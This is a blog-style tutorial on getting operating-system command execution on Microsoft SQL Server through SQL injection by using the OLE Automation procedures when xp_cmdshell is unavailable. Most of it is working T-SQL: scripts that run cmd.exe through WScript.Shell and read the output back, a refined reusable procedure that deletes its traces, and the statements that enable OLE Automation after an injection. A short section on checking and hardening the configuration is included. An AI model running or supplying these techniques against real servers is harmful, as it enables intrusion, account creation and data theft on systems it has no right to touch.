Run cmd commands on SQL servers with injection vulnerabilities without xp_cmdshell.

Source: Internet
Author: User
Tags: ole
An earlier article on this blog introduced the basic principles and methods of SQL injection. Perhaps the most interesting of them is using the extended stored procedure xp_cmdshell to run operating-system console commands. The method is very simple; only the following SQL statement is needed:

Exec master.dbo.xp_cmdshell 'dir C:\'

However, more and more database administrators are aware of how dangerous this extended stored procedure is, and they delete or rename xplog70.dll, the dynamic-link library that implements it. At this point many people give up: without a way to run cmd commands it is hard to list the files, directories and running services of the target machine, or to add NT users.

After some research I found that even when xp_cmdshell is unavailable, it is still possible to run cmd on the server and retrieve its output, because SQL Server ships several other system stored procedures: sp_OACreate, sp_OAGetProperty and sp_OAMethod, the OLE Automation procedures. The preconditions are that the WScript.Shell and Scripting.FileSystemObject COM components are available on the server, and that the injected query runs as a member of the sysadmin role, which is required to call sp_OACreate. On SQL Server 2005 and later the 'Ole Automation Procedures' server option must also be enabled, since it is off by default.
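The following is an added example, not part of the original article: on SQL Server 2005 and later it checks the two preconditions just described (sysadmin membership and the 'Ole Automation Procedures' option), shows the weak configuration an attacker needs next to the hardened one, and lists xp_cmdshell alongside it because both options are gated the same way. The option names and the sys.configurations view are real; the ordering of the statements is this example's own.

```sql
-- Added example (not from the original post). Requires SQL Server 2005 or later;
-- SQL Server 2000 has no such option and the sp_OA* procedures are always
-- callable by sysadmin members there.

-- Precondition 1: sp_OACreate can only be executed by members of sysadmin.
SELECT IS_SRVROLEMEMBER(N'sysadmin') AS is_sysadmin;   -- 1 = allowed, 0 = not

-- Precondition 2: both command-execution paths are advanced server options.
-- value_in_use = 1 means the procedure is callable right now.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN (N'xp_cmdshell', N'Ole Automation Procedures');

-- Weak state: what an attacker who already has sysadmin stacks after an
-- injection point to switch the OLE Automation procedures on.
EXEC sp_configure N'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure N'Ole Automation Procedures', 1;  RECONFIGURE;

-- Hardened state: switch both back off and hide the advanced options again.
-- Re-running the SELECT above should now show 0 for both rows.
EXEC sp_configure N'Ole Automation Procedures', 0;  RECONFIGURE;
EXEC sp_configure N'xp_cmdshell', 0;  RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;  RECONFIGURE;
```

Disabling the option is a control on the configuration, not on the account: a sysadmin (or an injection running as one) can re-enable it with the same two statements, so the sys.configurations query is the thing to alert on, and the real fix is an application login that is not sysadmin.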
sp_OACreate
Creates an instance of an OLE object on an instance of Microsoft SQL Server.
Syntax
sp_OACreate { progid | clsid }, objecttoken OUTPUT [, context]

sp_OAGetProperty
Gets a property value of an OLE object.
Syntax
sp_OAGetProperty objecttoken, propertyname [, propertyvalue OUTPUT] [, index...]

sp_OAMethod
Calls a method of an OLE object.
Syntax
sp_OAMethod objecttoken, methodname [, returnvalue OUTPUT] [, [@parametername =] parameter [OUTPUT]] [...n]

Idea:
First create a WScript.Shell object on the SQL Server and call its Run method to redirect the output of cmd.exe into a file. Then create a Scripting.FileSystemObject, use its OpenTextFile method to obtain a TextStream object, read the temporary file line by line, and insert each line as one row into a temporary table.

The following are the corresponding SQL statements:

Create Table mytmp (Info varchar(400), Id int identity(1,1) not null)
Declare @shell int
Declare @fso int
Declare @file int
Declare @isend bit
Declare @out varchar(400)
-- Create a WScript.Shell object and call Run; window style 0 hides the console window
Exec sp_OACreate 'WScript.Shell', @shell OUTPUT
Exec sp_OAMethod @shell, 'Run', null, 'cmd.exe /c dir C:\ > C:\temp.txt', 0, 'true'
-- Note: the third Run argument (bWaitOnReturn = true) makes Run block until the command has finished. It must be used for slow commands such as ping, otherwise the temporary file is read before the output has been written.

Exec sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT
Exec sp_OAMethod @fso, 'OpenTextFile', @file OUT, 'C:\temp.txt'
-- OpenTextFile returns a TextStream object, so @file holds an object token rather than a value

-- Read the file line by line; AtEndOfStream is the TextStream property that signals the end.
-- Checking it before the first ReadLine avoids an error when the command produced no output.
Exec sp_OAGetProperty @file, 'AtEndOfStream', @isend OUT
While @isend = 0
Begin
    Exec sp_OAMethod @file, 'ReadLine', @out OUT
    Insert Into mytmp (Info) Values (@out)
    Exec sp_OAGetProperty @file, 'AtEndOfStream', @isend OUT
End

-- The command output is now in the table, one row per line, in original order
Select Info From mytmp Order By Id

Drop Table mytmp
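The script above shows the bare technique. The following is an added example, not code from the original article, that wraps the same WScript.Shell and FileSystemObject steps in a reusable procedure and adds what a practitioner needs when the call fails half-way: HRESULT checks on every sp_OA* call, the OLE error text from sp_OAGetErrorInfo, sp_OADestroy cleanup, and deletion of the temporary file. It assumes SQL Server 2005 or later (TRY/CATCH), a sysadmin caller with 'Ole Automation Procedures' enabled, and a temp path writable by the SQL Server service account; the procedure name, parameter names and default path are this example's own choices.

```sql
-- Added example (not from the original post). Assumes SQL Server 2005+, a
-- sysadmin caller, 'Ole Automation Procedures' = 1, and that the SQL Server
-- service account can write to @tmp. Names below are this example's own.
CREATE PROCEDURE dbo.RunViaOle
    @cmd nvarchar(4000),                                  -- command line handed to cmd.exe /c
    @tmp nvarchar(260) = N'C:\Windows\Temp\ole_out.txt'   -- assumed writable temp file
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @shell int, @fso int, @file int, @hr int, @eof bit;
    DECLARE @cmdline nvarchar(4000), @line nvarchar(4000), @err nvarchar(4000);
    DECLARE @src nvarchar(255), @desc nvarchar(255);
    DECLARE @out TABLE (Id int IDENTITY(1,1) NOT NULL, Info nvarchar(4000));

    -- Parentheses group a compound command (a & b) so the redirection covers all of
    -- it; 2>&1 merges stderr so failures of the command itself are captured too.
    SET @cmdline = N'cmd.exe /c (' + @cmd + N') > "' + @tmp + N'" 2>&1';

    BEGIN TRY
        -- WScript.Shell.Run(command, windowStyle = 0 hidden, waitOnReturn = 1)
        EXEC @hr = sp_OACreate N'WScript.Shell', @shell OUTPUT;
        IF @hr <> 0 RAISERROR(N'sp_OACreate WScript.Shell failed: 0x%x', 16, 1, @hr);
        EXEC @hr = sp_OAMethod @shell, N'Run', NULL, @cmdline, 0, 1;
        IF @hr <> 0 RAISERROR(N'WScript.Shell.Run failed: 0x%x', 16, 1, @hr);

        -- OpenTextFile(path, 1 = ForReading) returns a TextStream; @file is an object token
        EXEC @hr = sp_OACreate N'Scripting.FileSystemObject', @fso OUTPUT;
        IF @hr <> 0 RAISERROR(N'sp_OACreate FileSystemObject failed: 0x%x', 16, 1, @hr);
        EXEC @hr = sp_OAMethod @fso, N'OpenTextFile', @file OUTPUT, @tmp, 1;
        IF @hr <> 0 RAISERROR(N'OpenTextFile failed: 0x%x', 16, 1, @hr);

        -- Test AtEndOfStream before the first ReadLine: an empty output file is not an error
        EXEC sp_OAGetProperty @file, N'AtEndOfStream', @eof OUTPUT;
        WHILE @eof = 0
        BEGIN
            EXEC sp_OAMethod @file, N'ReadLine', @line OUTPUT;
            INSERT INTO @out (Info) VALUES (@line);
            EXEC sp_OAGetProperty @file, N'AtEndOfStream', @eof OUTPUT;
        END
        EXEC sp_OAMethod @file, N'Close';
        EXEC sp_OAMethod @fso, N'DeleteFile', NULL, @tmp;   -- leave no output file behind
    END TRY
    BEGIN CATCH
        SET @err = ERROR_MESSAGE();
        -- With a NULL token, sp_OAGetErrorInfo reports the most recent OLE Automation error
        EXEC sp_OAGetErrorInfo NULL, @src OUTPUT, @desc OUTPUT;
        IF @desc IS NOT NULL
            SET @err = @err + N' [' + ISNULL(@src, N'') + N': ' + @desc + N']';
    END CATCH

    -- Release the COM objects whether or not the run succeeded
    IF @file  IS NOT NULL EXEC sp_OADestroy @file;
    IF @fso   IS NOT NULL EXEC sp_OADestroy @fso;
    IF @shell IS NOT NULL EXEC sp_OADestroy @shell;

    IF @err IS NOT NULL
    BEGIN
        RAISERROR(@err, 16, 1);
        RETURN;
    END

    -- One row per output line, in the order the command wrote them
    SELECT Id, Info FROM @out ORDER BY Id;
END
GO

-- Usage: run a compound command and read its output back as rows
EXEC dbo.RunViaOle N'whoami & ipconfig';
```

Because every sp_OA* call returns an HRESULT, checking it is the only way to tell a command that ran and printed nothing from a Run call that never started; the original script cannot distinguish the two, and its ReadLine-before-check loop fails outright on an empty file.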
 
